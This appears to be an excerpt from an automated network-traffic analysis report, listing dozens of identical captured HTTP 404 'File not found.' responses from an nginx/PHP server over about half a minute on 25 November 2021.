        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
